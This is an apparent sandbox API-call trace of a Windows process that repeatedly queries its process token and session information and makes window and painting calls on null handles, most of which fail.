SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.041] SetForegroundWindow (hWnd=0x0) returned 0 [0072.041] BringWindowToTop (hWnd=0x0) returned 0 [0072.041] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x44c) returned 1 [0072.041] GetTokenInformation (in: TokenHandle=0x44c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.041] GetLastError () returned 0x7a [0072.041] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.041] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.042] WTSFreeMemory (pMemory=0x0) [0072.042] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.042] TextOutW (hdc=0x0, x=1354, y=3149, lpString="", c=0) returned 1 [0072.042] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.042] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.042] GetTickCount () returned 0x1f19e [0072.045] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.045] SetForegroundWindow (hWnd=0x0) returned 0 [0072.045] BringWindowToTop (hWnd=0x0) returned 0 [0072.045] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x450) returned 1 [0072.045] GetTokenInformation (in: TokenHandle=0x450, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.045] GetLastError () returned 0x7a [0072.045] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.045] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.046] WTSFreeMemory (pMemory=0x0) [0072.046] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.046] TextOutW (hdc=0x0, x=1364, y=3174, lpString="", c=0) returned 1 [0072.046] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.046] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.046] GetTickCount () returned 0x1f19e [0072.047] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.047] SetForegroundWindow (hWnd=0x0) returned 0 [0072.047] BringWindowToTop (hWnd=0x0) returned 0 [0072.047] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x454) returned 1 [0072.047] GetTokenInformation (in: TokenHandle=0x454, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.047] GetLastError () returned 0x7a [0072.047] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.047] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.048] WTSFreeMemory (pMemory=0x0) [0072.048] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.048] TextOutW (hdc=0x0, x=1374, y=3199, lpString="", c=0) returned 1 [0072.048] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.048] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.048] GetTickCount () returned 0x1f19e [0072.054] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.054] SetForegroundWindow (hWnd=0x0) returned 0 [0072.054] BringWindowToTop (hWnd=0x0) returned 0 [0072.054] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x458) returned 1 [0072.054] GetTokenInformation (in: TokenHandle=0x458, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.054] GetLastError () returned 0x7a [0072.054] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.054] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.055] WTSFreeMemory (pMemory=0x0) [0072.055] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.055] TextOutW (hdc=0x0, x=1384, y=3224, lpString="", c=0) returned 1 [0072.055] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.055] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.055] GetTickCount () returned 0x1f1ae [0072.056] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.056] SetForegroundWindow (hWnd=0x0) returned 0 [0072.056] BringWindowToTop (hWnd=0x0) returned 0 [0072.056] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x45c) returned 1 [0072.056] GetTokenInformation (in: TokenHandle=0x45c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.056] GetLastError () returned 0x7a [0072.056] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.056] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.057] WTSFreeMemory (pMemory=0x0) [0072.057] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.057] TextOutW (hdc=0x0, x=1394, y=3249, lpString="", c=0) returned 1 [0072.057] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.057] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.057] GetTickCount () returned 0x1f1ae [0072.058] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.058] SetForegroundWindow (hWnd=0x0) returned 0 [0072.058] BringWindowToTop (hWnd=0x0) returned 0 [0072.058] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x460) returned 1 [0072.058] GetTokenInformation (in: TokenHandle=0x460, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.058] GetLastError () returned 0x7a [0072.058] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.059] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.059] WTSFreeMemory (pMemory=0x0) [0072.059] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.059] TextOutW (hdc=0x0, x=1404, y=3274, lpString="", c=0) returned 1 [0072.059] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.059] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.059] GetTickCount () returned 0x1f1ae [0072.060] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.060] SetForegroundWindow (hWnd=0x0) returned 0 [0072.060] BringWindowToTop (hWnd=0x0) returned 0 [0072.060] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x464) returned 1 [0072.060] GetTokenInformation (in: TokenHandle=0x464, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.060] GetLastError () returned 0x7a [0072.060] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.060] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.061] WTSFreeMemory (pMemory=0x0) [0072.061] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.061] TextOutW (hdc=0x0, x=1414, y=3299, lpString="", c=0) returned 1 [0072.061] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.061] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.061] GetTickCount () returned 0x1f1ae [0072.070] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.070] SetForegroundWindow (hWnd=0x0) returned 0 [0072.070] BringWindowToTop (hWnd=0x0) returned 0 [0072.070] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x468) returned 1 [0072.070] GetTokenInformation (in: TokenHandle=0x468, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.070] GetLastError () returned 0x7a [0072.070] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.070] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.071] WTSFreeMemory (pMemory=0x0) [0072.071] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.071] TextOutW (hdc=0x0, x=1424, y=3324, lpString="", c=0) returned 1 [0072.071] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.071] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.071] GetTickCount () returned 0x1f1bd [0072.074] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.074] SetForegroundWindow (hWnd=0x0) returned 0 [0072.074] BringWindowToTop (hWnd=0x0) returned 0 [0072.074] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x46c) returned 1 [0072.074] GetTokenInformation (in: TokenHandle=0x46c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.074] GetLastError () returned 0x7a [0072.074] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.074] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.075] WTSFreeMemory (pMemory=0x0) [0072.075] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.075] TextOutW (hdc=0x0, x=1434, y=3349, lpString="", c=0) returned 1 [0072.075] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.075] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.075] GetTickCount () returned 0x1f1bd [0072.076] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.076] SetForegroundWindow (hWnd=0x0) returned 0 [0072.076] BringWindowToTop (hWnd=0x0) returned 0 [0072.076] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x470) returned 1 [0072.076] GetTokenInformation (in: TokenHandle=0x470, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.077] GetLastError () returned 0x7a [0072.077] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.077] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.077] WTSFreeMemory (pMemory=0x0) [0072.077] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.077] TextOutW (hdc=0x0, x=1444, y=3374, lpString="", c=0) returned 1 [0072.077] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.077] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.077] GetTickCount () returned 0x1f1bd [0072.078] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.078] SetForegroundWindow (hWnd=0x0) returned 0 [0072.079] BringWindowToTop (hWnd=0x0) returned 0 [0072.079] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x474) returned 1 [0072.079] GetTokenInformation (in: TokenHandle=0x474, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.079] GetLastError () returned 0x7a [0072.079] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.079] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.079] WTSFreeMemory (pMemory=0x0) [0072.079] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.079] TextOutW (hdc=0x0, x=1454, y=3399, lpString="", c=0) returned 1 [0072.079] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.080] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.080] GetTickCount () returned 0x1f1bd [0072.081] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.081] SetForegroundWindow (hWnd=0x0) returned 0 [0072.081] BringWindowToTop (hWnd=0x0) returned 0 [0072.081] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x478) returned 1 [0072.082] GetTokenInformation (in: TokenHandle=0x478, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.082] GetLastError () returned 0x7a [0072.082] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.082] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.082] WTSFreeMemory (pMemory=0x0) [0072.082] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.082] TextOutW (hdc=0x0, x=1464, y=3424, lpString="", c=0) returned 1 [0072.082] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.082] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.082] GetTickCount () returned 0x1f1cd [0072.088] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.088] SetForegroundWindow (hWnd=0x0) returned 0 [0072.088] BringWindowToTop (hWnd=0x0) returned 0 [0072.088] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x47c) returned 1 [0072.088] GetTokenInformation (in: TokenHandle=0x47c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.088] GetLastError () returned 0x7a [0072.088] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.088] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.089] WTSFreeMemory (pMemory=0x0) [0072.089] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.089] TextOutW (hdc=0x0, x=1474, y=3449, lpString="", c=0) returned 1 [0072.089] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.089] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.089] GetTickCount () returned 0x1f1cd [0072.090] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.090] SetForegroundWindow (hWnd=0x0) returned 0 [0072.090] BringWindowToTop (hWnd=0x0) returned 0 [0072.090] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x480) returned 1 [0072.090] GetTokenInformation (in: TokenHandle=0x480, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.090] GetLastError () returned 0x7a [0072.090] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.091] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.091] WTSFreeMemory (pMemory=0x0) [0072.091] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.091] TextOutW (hdc=0x0, x=1484, y=3474, lpString="", c=0) returned 1 [0072.091] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.091] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.091] GetTickCount () returned 0x1f1cd [0072.095] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.095] SetForegroundWindow (hWnd=0x0) returned 0 [0072.095] BringWindowToTop (hWnd=0x0) returned 0 [0072.095] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x484) returned 1 [0072.095] GetTokenInformation (in: TokenHandle=0x484, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.095] GetLastError () returned 0x7a [0072.095] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.095] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.096] WTSFreeMemory (pMemory=0x0) [0072.096] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.101] TextOutW (hdc=0x0, x=1494, y=3499, lpString="", c=0) returned 1 [0072.101] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.101] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.101] GetTickCount () returned 0x1f1dd [0072.105] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.105] SetForegroundWindow (hWnd=0x0) returned 0 [0072.105] BringWindowToTop (hWnd=0x0) returned 0 [0072.105] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x488) returned 1 [0072.105] GetTokenInformation (in: TokenHandle=0x488, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.105] GetLastError () returned 0x7a [0072.105] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.105] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.106] WTSFreeMemory (pMemory=0x0) [0072.106] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.106] TextOutW (hdc=0x0, x=1504, y=3524, lpString="", c=0) returned 1 [0072.106] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.106] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.106] GetTickCount () returned 0x1f1dd [0072.109] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.110] SetForegroundWindow (hWnd=0x0) returned 0 [0072.110] BringWindowToTop (hWnd=0x0) returned 0 [0072.110] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x48c) returned 1 [0072.110] GetTokenInformation (in: TokenHandle=0x48c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.110] GetLastError () returned 0x7a [0072.110] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.110] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.110] WTSFreeMemory (pMemory=0x0) [0072.111] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.111] TextOutW (hdc=0x0, x=1514, y=3549, lpString="", c=0) returned 1 [0072.111] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.111] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.111] GetTickCount () returned 0x1f1dd [0072.119] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.119] SetForegroundWindow (hWnd=0x0) returned 0 [0072.119] BringWindowToTop (hWnd=0x0) returned 0 [0072.120] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x490) returned 1 [0072.120] GetTokenInformation (in: TokenHandle=0x490, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.120] GetLastError () returned 0x7a [0072.120] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.120] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.120] WTSFreeMemory (pMemory=0x0) [0072.120] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.120] TextOutW (hdc=0x0, x=1524, y=3574, lpString="", c=0) returned 1 [0072.120] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.121] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.121] GetTickCount () returned 0x1f1ec [0072.121] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.121] SetForegroundWindow (hWnd=0x0) returned 0 [0072.122] BringWindowToTop (hWnd=0x0) returned 0 [0072.122] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x494) returned 1 [0072.122] GetTokenInformation (in: TokenHandle=0x494, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.122] GetLastError () returned 0x7a [0072.122] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.122] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.122] WTSFreeMemory (pMemory=0x0) [0072.122] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.122] TextOutW (hdc=0x0, x=1534, y=3599, lpString="", c=0) returned 1 [0072.122] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.122] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.123] GetTickCount () returned 0x1f1ec [0072.124] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.124] SetForegroundWindow (hWnd=0x0) returned 0 [0072.124] BringWindowToTop (hWnd=0x0) returned 0 [0072.124] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x498) returned 1 [0072.124] GetTokenInformation (in: TokenHandle=0x498, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.124] GetLastError () returned 0x7a [0072.124] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.124] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.125] WTSFreeMemory (pMemory=0x0) [0072.125] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.125] TextOutW (hdc=0x0, x=1544, y=3624, lpString="", c=0) returned 1 